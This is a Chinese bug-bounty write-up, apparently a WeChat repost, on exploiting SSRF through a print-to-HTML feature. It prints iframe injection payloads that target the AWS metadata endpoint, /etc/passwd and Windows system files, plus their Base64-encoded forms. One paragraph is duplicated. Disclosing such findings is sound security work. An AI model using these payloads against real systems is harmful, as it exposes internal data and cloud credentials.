利用SSRF访问内部数据
2024-12-2 20:30:0 Author: mp.weixin.qq.com(查看原文) 阅读量:5 收藏

服务器端请求伪造 (SSRF) 是一种 Web 安全漏洞,当攻击者操纵服务器向非预期目标发出未经授权的 HTTP 或其他基于协议的请求时,就会发生此类漏洞。

比如某个应用程序使用了不同的内部域来处理财务数据,并通过 iframe 获取数据。

在深入探索该应用程序时,发现了一处打印功能。

此功能将页面转换为 HTML,以 Base64 对其进行编码,然后发送以等待打印。

这不禁让人想起了NahamSec 和其它安全研究人员的文章和视频中的 SSRF 技术,特别是围绕 PDF 转换功能,这些功能通常存在 SSRF 风险。

首先尝试使用一些常用的Payloads来检查 SSRF,比如使用针对 AWS 元数据端点和 Linux 文件路径的命令:

"><iframe src="http://169.254.169.254/latest/meta-data" height=2500 width=500> "><iframe src="cat /etc/passwd" height=2500 width=500>

但是遇到了 iframe 中高度和宽度参数的问题,这会导致输出失真。经过一番尝试,白帽小哥最终找到了这些参数的正确结构。

但是遇到了 iframe 中高度和宽度参数的问题,这会导致输出失真。经过一番尝试,白帽小哥最终找到了这些参数的正确结构。

"><iframe src="C:\Windows\debug\NetSetup.LOG" height=2500 width=500> "><iframe/src="C:/Windows/win.ini">
Ij48aWZyYW1lL3NyYz0iQzpcV2luZG93c1xkZWJ1Z1xOZXRTZXR1cC5MT0ciIGhlaWdodD0yNTAwIHdpZHRoPTUwMD4=Ij48aWZyYW1lL3NyYz0iQzpcV2luZG93c1xkZWJ1Z1xOZXRTZXR1cC5MT0ciIGhlaWdodD01MDAgd2lkdGg9NzAwPg==

发送请求如下:

成功收获SSRF漏洞:

如果你是一个长期主义者,欢迎加入我的知识星球,我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款

往期回顾

一款bp神器

ssrf绕过新思路

一个辅助测试ssrf的工具

dom-xss精选文章

年度精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips


文章来源: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247496500&idx=1&sn=368776a42e67f89aadee8460a6e2163b&chksm=e8a5f957dfd27041a975c05b121161fd29c9ef4bbbbf567f0baedcba998c6d4c5bd9cceaf197&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh